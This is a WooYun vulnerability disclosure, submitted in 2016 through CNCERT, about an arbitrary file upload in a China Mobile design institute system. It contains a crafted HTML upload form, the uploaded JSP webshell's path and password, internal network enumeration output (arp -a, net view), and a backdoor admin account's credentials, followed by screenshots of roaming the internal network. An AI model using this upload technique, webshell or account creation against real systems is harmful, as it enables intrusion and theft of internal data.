当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211693

漏洞标题:中国移动设计院某系统存在任意文件上传漏洞导致内网漫游大量内网信息

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-05-22 18:00

修复时间:2016-07-08 11:10

公开时间:2016-07-08 11:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-22: 细节已通知厂商并且等待厂商处理中
2016-05-24: 厂商已经确认,细节仅向厂商公开
2016-06-03: 细节向核心白帽子及相关领域专家公开
2016-06-13: 细节向普通白帽子公开
2016-06-23: 细节向实习白帽子公开
2016-07-08: 细节向公众公开

简要描述:

任意文件上传

详细说明:

**.**.**.**/

QQ截图20160522135550.png


本地构造上传页面

<html>
<form action="**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000&" method="post" enctype="multipart/form-data">
<input type='file' name='file' />
<input type='hidden' name='filename' value="null" />
<input type='hidden' name='id type=' value="" />
<input type="submit" value='提 交' name="Submit"></form>
repository/000000000/wpp1.jsp
</html>


上传shell
**.**.**.**/repository/000000000/wpp1.jsp
密码:023

QQ截图20160522135646.png

漏洞证明:

QQ截图20160522135658.png


[*] 基本信息 [ A:C:D:E: ]
E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\> arp -a
接口: **.**.**.** --- 0xa
  Internet 地址         物理地址              类型
  **.**.**.**           bc-46-99-74-98-31     动态      
  **.**.**.**           c4-54-44-8c-c4-32     动态      
  **.**.**.**           18-67-b0-bd-95-3a     动态      
  **.**.**.**           c8-0a-a9-58-b9-e9     动态      
  **.**.**.**           f0-4d-a2-c7-61-da     动态      
  **.**.**.**           68-f7-28-9b-1a-50     动态      
  **.**.**.**           00-19-21-1c-e9-e1     动态      
  **.**.**.**           20-89-84-d3-c5-14     动态      
  **.**.**.**0          f0-de-f1-e9-ce-5a     动态      
  **.**.**.**1          00-1f-16-1d-59-66     动态      
  **.**.**.**3          68-f7-28-79-c5-2b     动态      
  **.**.**.**4          f0-4d-a2-c7-61-da     动态      
  **.**.**.**5          c8-0a-a9-58-b9-e9     动态      
  **.**.**.**6          3c-07-54-0a-0c-e6     动态      
  **.**.**.**7          00-1f-16-10-a4-c0     动态      
  **.**.**.**8          30-85-a9-71-25-3f     动态      
  **.**.**.**9          5c-f9-dd-4c-be-a5     动态      
  **.**.**.**0          68-f7-28-9b-1a-50     动态      
  **.**.**.**1          76-4d-5d-b5-fb-c1     动态      
  **.**.**.**2          74-e6-e2-3e-69-6c     动态      
  **.**.**.**3          00-24-54-d2-3e-a4     动态      
  **.**.**.**4          20-6a-8a-05-f0-eb     动态      
  **.**.**.**5          14-da-e9-63-bc-20     动态      
  **.**.**.**6          b0-25-aa-16-e6-0c     动态      
  **.**.**.**7          3c-97-0e-21-54-ef     动态      
  **.**.**.**0          f0-de-f1-e9-ca-09     动态      
  **.**.**.**1          54-04-a6-77-ef-c2     动态      
  **.**.**.**2          a0-1d-48-fc-4b-7e     动态      
  **.**.**.**3          00-24-54-ff-2f-7a     动态      
  **.**.**.**5          3c-97-0e-16-ce-e3     动态      
  **.**.**.**6          bc-30-5b-cb-d7-16     动态      
  **.**.**.**7          2c-27-d7-c8-74-c0     动态      
  **.**.**.**8          3c-97-0e-16-ce-e3     动态      
  **.**.**.**9          24-b6-fd-0e-c4-50     动态      
  **.**.**.**          54-04-a6-b0-40-08     动态      
  **.**.**.**          68-5b-35-d5-68-6e     动态      
  **.**.**.**          20-6a-8a-4a-00-a9     动态      
  **.**.**.**          f0-de-f1-e9-c9-d2     动态      
  **.**.**.**          00-1f-16-10-a4-c0     动态      
  **.**.**.**          20-6a-8a-44-aa-9f     动态      
  **.**.**.**          bc-30-5b-cb-d7-16     动态      
  **.**.**.**7          f0-de-f1-e9-cb-d6     动态      
  **.**.**.**0          54-04-a6-b0-40-08     动态      
  **.**.**.**1          20-6a-8a-44-aa-9f     动态      
  **.**.**.**2          3c-97-0e-ae-64-f8     动态      
  **.**.**.**3          e4-11-5b-5a-08-31     动态      
  **.**.**.**4          bc-ae-c5-11-49-51     动态      
  **.**.**.**5          00-90-f5-f4-6d-76     动态      
  **.**.**.**7          00-e0-4c-36-15-01     动态      
  **.**.**.**8          3c-97-0e-ae-67-8c     动态      
  **.**.**.**9          f0-de-f1-97-07-40     动态      
  **.**.**.**0          00-1f-16-1d-4e-c6     动态      
  **.**.**.**1          04-7d-7b-a7-b3-d4     动态      
  **.**.**.**2          00-0c-29-5a-3e-ba     动态      
  **.**.**.**3          04-02-1f-58-db-0a     动态      
  **.**.**.**4          00-1e-90-b2-9a-f3     动态      
  **.**.**.**5          c4-54-44-8c-c4-32     动态      
  **.**.**.**6          68-f7-28-79-c5-2b     动态      
  **.**.**.**7          28-d2-44-86-3d-7a     动态      
  **.**.**.**9          a4-ba-db-c6-6e-0b     动态      
  **.**.**.**0          28-d2-44-86-3e-52     动态      
  **.**.**.**3          20-6a-8a-4a-00-a9     动态      
  **.**.**.**4          28-92-4a-42-bb-33     动态      
  **.**.**.**8          f0-de-f1-e9-cb-d6     动态      
  **.**.**.**2          00-03-10-09-0f-0c     动态      
  **.**.**.**3          24-b6-fd-0e-c4-50     动态      
  **.**.**.**16         00-13-72-82-ed-06     动态      
  **.**.**.**23         00-21-9b-31-5e-07     动态      
  **.**.**.**87         94-0c-6d-17-18-55     动态      
  **.**.**.**           00-14-22-1c-a0-4c     动态      
  **.**.**.**          00-18-8b-90-d3-6e     动态      
  **.**.**.**          00-23-ae-8d-a2-46     动态      
  **.**.**.**          00-0c-29-04-a3-fd     动态      
  **.**.**.**          00-50-56-b7-00-01     动态      
  **.**.**.**          00-50-56-b7-00-0d     动态      
  **.**.**.**         00-50-56-8e-4f-d8     动态      
  **.**.**.**         00-50-56-8e-57-01     动态      
  **.**.**.**         00-19-b9-35-97-bc     动态      
  **.**.**.**         d4-ae-52-78-06-0f     动态      
  **.**.**.**         00-0c-29-cc-c0-4a     动态      
  **.**.**.**         c0-62-6b-e2-28-40     动态      
  **.**.**.**         00-64-40-3b-11-40     动态      
  **.**.**.**         00-00-0c-07-ac-db     动态      
  **.**.**.**         ff-ff-ff-ff-ff-ff     静态      
  **.**.**.**             01-00-5e-00-00-02     静态      
  **.**.**.**             01-00-5e-00-00-05     静态      
  **.**.**.**2            01-00-5e-00-00-16     静态      
  **.**.**.**52           01-00-5e-00-00-fc     静态      
  **.**.**.**       01-00-5e-7f-ff-fa     静态      
  **.**.**.**             01-00-5e-00-00-01     静态      
  **.**.**.**       01-00-5e-7f-ff-fa     静态      
E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\> net view
服务器名称            注解
-------------------------------------------------------------------------------
\\36D6C4EB20B2477                                                              
\\6GOFTIHBQUZ88VD                                                              
\\BTE_DISPLAY                                                                  
\\CMTRANS_DEV4                                                                 
\\CMTRANS_EXE1                                                                 
\\CMTRANS_TEST1                                                                
\\DB_DEVELOP                                                                   
\\DB_DISPLAY                                                                   
\\DEV184                                                                       
\\DEV186                                                                       
\\DEVDB188             testdb178                                               
\\FTP123                                                                       
\\GPDI-0PT-GIS9                                                                
\\GPDI-7BD0A8D4CD                                                              
\\GPDI-891A7765EF                                                              
\\GPDI-C2A1697A13                                                              
\\GPDI-JIRA                                                                    
\\GPDI-OPT-DB                                                                  
\\GPDI-OPT-GIS10                                                               
\\GPDI-STU6IKT7                                                                
\\HLJTESTDB166                                                                 
\\ICT-APP-TEST         ICT-APP-TEST                                            
\\ICT-DB-DEV           ICT-DB-DEV                                              
\\ICT-FILE-SERVER      ICT-FILE-SERVER                                         
\\ICT-JIRA             ICT-JIRA                                                
\\INBUILDCOVER_DE                                                              
\\INFO-EB27663991                                                              
\\MAP141                                                                       
\\NRPT-DEV                                                                     
\\OPT-DELAY-DEV                                                                
\\OPT-INFOCADREG                                                               
\\OPT-MYSQLDB                                                                  
\\PINGSHAN                                                                     
\\PLATFORM-SERVER                                                              
\\RESOURCE129                                                                  
\\TEST174                                                                      
\\TEST176                                                                      
\\TESTDB178            testdb178                                               
\\TRANSPDA                                                                     
\\WIN-3UB6DGFEI5H                                                              
\\WIN-8E4MVQIM51D                                                              
\\WIN-C89I4PETNUD                                                              
\\WIN-CDSIEMS8E6L                                                              
\\WIN-R1EOGAPCOBC                                                              
命令成功完成。
E:\Program Files\Bronzesoft2\RDM\Application\rdmapp\power\>


QQ截图20160522135735.png


新建管理远程服务器
awpp/1@wppa

QQ截图20160522135850.png


大量内部文档资料

QQ截图20160522140031.png


QQ截图20160522140142.png


文件仍在更新

QQ截图20160522140439.png


端口映射

QQ截图20160522140538.png


简单漫游一下

QQ截图20160522141844.png


越来越多奇怪的网站

QQ截图20160522142503.png


打印机也来了

QQ截图20160522143650.png


又是一台

QQ截图20160522144116.png


我要不要恶搞一下

QQ截图20160522144200.png


又来一台

QQ截图20160522144333.png


公安厅的神马文件

QQ截图20160522144432.png


jenkins

QQ截图20160522145032.png


到此为止吧

修复方案:

删除shell,删除帐号,补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-24 11:08

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-07-08 11:19 | 恶魔奶爸 丶 ( 路人 | Rank:2 漏洞数:1 | 未留下任何痕迹)

    登陆后才能上传吧?